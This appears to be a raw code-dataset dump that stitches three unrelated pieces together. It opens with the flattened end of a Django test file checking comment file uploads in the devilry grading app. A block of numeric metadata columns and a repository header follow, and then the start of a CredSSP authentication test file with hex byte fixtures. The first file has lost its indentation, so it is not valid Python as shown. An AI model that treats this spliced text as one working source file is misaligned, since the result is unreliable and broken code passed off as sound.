cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
comment_file1 = comment_models.CommentFile.objects.get(filename='testfile1.txt')
comment_file2 = comment_models.CommentFile.objects.get(filename='testfile2.txt')
comment_file3 = comment_models.CommentFile.objects.get(filename='testfile3.txt')
# Check content of testfile 1.
self.assertEqual('testfile1.txt', comment_file1.filename)
self.assertEqual(b'Test content1', comment_file1.file.file.read())
self.assertEqual(len('Test content1'), comment_file1.filesize)
self.assertEqual('text/txt', comment_file1.mimetype)
# Check content of testfile 2.
self.assertEqual('testfile2.txt', comment_file2.filename)
self.assertEqual(b'Test content2', comment_file2.file.file.read())
self.assertEqual(len('Test content2'), comment_file2.filesize)
self.assertEqual('text/txt', comment_file2.mimetype)
# Check content of testfile 3.
self.assertEqual('testfile3.txt', comment_file3.filename)
self.assertEqual(b'Test content3', comment_file3.file.file.read())
self.assertEqual(len(b'Test content3'), comment_file3.filesize)
self.assertEqual('text/txt', comment_file3.mimetype)
def test_upload_files_and_comment_text(self):
        # Test that both the comment text and the uploaded files are saved.
testfeedbackset = group_baker.feedbackset_first_attempt_published(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': 'Test comment',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(2, comment_models.CommentFile.objects.count())
self.assertEqual(1, group_models.GroupComment.objects.count())
group_comments = group_models.GroupComment.objects.all()
self.assertEqual('Test comment', group_comments[0].text)
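# Same file-upload scenarios as above, but through the internal-notes view, so
# the resulting comments must be visible to examiners and admins only.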
class TestFeedbackfeedExaminerWithAdminDiscussFileUpload(TestCase,
mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
viewclass = feedbackfeed_examiner.ExaminerWithAdminsDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_comment_without_text_or_file_visibility_examiners_and_admins(self):
        # Test that an error message is shown when posting a comment without either text or a file.
        # Posting a comment visible to examiners and admins only.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
mockresponse = self.mock_http200_postrequest_htmls(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
}
})
self.assertEqual(0, group_models.GroupComment.objects.count())
self.assertEqual(
'A comment must have either text or a file attached, or both. An empty comment is not allowed.',
mockresponse.selector.one('#error_1_id_text').alltext_normalized)
def test_upload_single_file_visibility_examiners_and_admins(self):
# Test that a CommentFile is created on upload.
# Posting comment with visibility visible to examiners and admins
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfile(
user=testexaminer.relatedexaminer.user)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(1, comment_models.CommentFile.objects.count())
def test_upload_single_file_content_visibility_examiners_and_admins(self):
# Test the content of a CommentFile after upload.
# Posting comment with visibility visible to examiners and admins
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile.txt', content=b'Test content', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(1, comment_models.CommentFile.objects.count())
comment_file = comment_models.CommentFile.objects.all()[0]
self.assertEqual('testfile.txt', comment_file.filename)
self.assertEqual(b'Test content', comment_file.file.file.read())
self.assertEqual(len('Test content'), comment_file.filesize)
self.assertEqual('text/txt', comment_file.mimetype)
def test_upload_multiple_files_visibility_examiners_and_admins(self):
        # Test that one CommentFile is created per uploaded file.
        # Posting a comment with visibility restricted to examiners and admins.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_comment_for_examiners': 'unused value',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
def test_upload_multiple_files_contents_visibility_examiners_and_admins(self):
        # Test the content of each CommentFile after upload.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_comment_for_examiners': 'unused value',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
comment_file1 = comment_models.CommentFile.objects.get(filename='testfile1.txt')
comment_file2 = comment_models.CommentFile.objects.get(filename='testfile2.txt')
comment_file3 = comment_models.CommentFile.objects.get(filename='testfile3.txt')
# Check content of testfile 1.
self.assertEqual('testfile1.txt', comment_file1.filename)
self.assertEqual(b'Test content1', comment_file1.file.file.read())
self.assertEqual(len('Test content1'), comment_file1.filesize)
self.assertEqual('text/txt', comment_file1.mimetype)
# Check content of testfile 2.
self.assertEqual('testfile2.txt', comment_file2.filename)
self.assertEqual(b'Test content2', comment_file2.file.file.read())
self.assertEqual(len('Test content2'), comment_file2.filesize)
self.assertEqual('text/txt', comment_file2.mimetype)
# Check content of testfile 3.
self.assertEqual('testfile3.txt', comment_file3.filename)
self.assertEqual(b'Test content3', comment_file3.file.file.read())
self.assertEqual(len(b'Test content3'), comment_file3.filesize)
self.assertEqual('text/txt', comment_file3.mimetype)
| 55.591257
| 131
| 0.682342
| 5,056
| 50,866
| 6.617089
| 0.055973
| 0.033357
| 0.028366
| 0.025735
| 0.935378
| 0.925096
| 0.908387
| 0.895116
| 0.881695
| 0.873117
| 0
| 0.009361
| 0.227165
| 50,866
| 914
| 132
| 55.652079
| 0.841698
| 0.027071
| 0
| 0.796319
| 0
| 0.011043
| 0.144405
| 0.065611
| 0
| 0
| 0
| 0
| 0.173006
| 1
| 0.051534
| false
| 0.008589
| 0.017178
| 0
| 0.079755
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dba81fba80a39f3d871a8641f564e7ed9fcb868
| 50,366
|
py
|
Python
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 19
|
2016-09-06T19:11:52.000Z
|
2022-03-05T23:30:37.000Z
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 24
|
2016-09-02T04:03:34.000Z
|
2022-02-17T05:44:23.000Z
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 5
|
2016-10-26T16:08:49.000Z
|
2021-05-10T04:19:15.000Z
|
import collections
import os
import re
import requests
import struct
import warnings
import pytest
from xml.etree import ElementTree as ET
from requests_credssp.credssp import CredSSPContext, HttpCredSSPAuth
from requests_credssp.exceptions import AuthenticationException, InvalidConfigurationException, NTStatusException
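# WrapResult mimics the value returned by an auth context's wrap() call; the
# FakeContext helpers below use it so the tests can exercise message building
# without a real NTLM/Kerberos context.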
WrapResult = collections.namedtuple('WrapResult', ['data'])
class TestCredSSPContext(object):
def test_invalid_auth_mechanism(self):
        with pytest.raises(InvalidConfigurationException) as exc:
            CredSSPContext("", "", "", auth_mechanism="fake")
        assert str(exc.value) == "Invalid auth_mechanism supplied fake, must be auto, ntlm, or kerberos"
def test_tls_default(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 6
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "")
def test_tls_enable_1_2(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 6
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "", disable_tlsv1_2=False)
def test_tls_disable_1_2(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 4
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
def set_options(self, options):
assert options == 0x00000800 | 0x00000200
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "", disable_tlsv1_2=True)
def test_build_pub_key_auth_old_no_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = None
auth_token = None
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x82\x01\x1F" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa3\x82\x01\x16" \
b"\x04\x82\x01\x12" \
b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01" \
b"\x00\x00\x00\x00"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_build_pub_key_auth_old_with_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = None
auth_token = b"\x01\x02\x03\x04"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x82\x01\x2D" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa1\x0C" \
b"\x30\x0A" \
b"\x30\x08" \
b"\xa0\x06" \
b"\x04\x04" \
b"\x01\x02\x03\x04" \
b"\xa3\x82\x01\x16" \
b"\x04\x82\x01\x12" \
b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01" \
b"\x00\x00\x00\x00"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
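    # The "new" variants model CredSSP protocol version 5 and later, where
    # pubKeyAuth carries a wrapped SHA256 hash over the magic string
    # "CredSSP Client-To-Server Binding Hash\x00", the client nonce and the
    # public key, rather than the wrapped key itself (see MS-CSSP), and the
    # nonce is echoed in the clientNonce [5] field.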
def test_build_pub_key_auth_new_no_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = b"\xff" * 32
auth_token = None
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x51" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa3\x26" \
b"\x04\x24" \
b"\xe6\x43\x6d\x98\xee\x73\x5a\x5f" \
b"\xba\xe3\x0b\xd7\xd8\x9b\xeb\xb3" \
b"\xec\x28\xf7\xe3\xf9\x6c\x95\xf4" \
b"\x62\xb2\xf5\xe9\x02\xe1\xb6\x38" \
b"\x00\x00\x00\x00" \
b"\xa5\x22" \
b"\x04\x20" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_build_pub_key_auth_new_with_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = b"\xff" * 32
auth_token = b"\x01\x02\x03\x04"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x5F" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa1\x0c" \
b"\x30\x0a" \
b"\x30\x08" \
b"\xa0\x06" \
b"\x04\x04" \
b"\x01\x02\x03\x04" \
b"\xa3\x26" \
b"\x04\x24" \
b"\xe6\x43\x6d\x98\xee\x73\x5a\x5f" \
b"\xba\xe3\x0b\xd7\xd8\x9b\xeb\xb3" \
b"\xec\x28\xf7\xe3\xf9\x6c\x95\xf4" \
b"\x62\xb2\xf5\xe9\x02\xe1\xb6\x38" \
b"\x00\x00\x00\x00" \
b"\xa5\x22" \
b"\x04\x20" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
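    # Verification tests: with no nonce (pre-version-5 servers) the server is
    # expected to return the public key with its first byte incremented by one,
    # hence response_key starting with \x31 instead of \x30 below. With a nonce,
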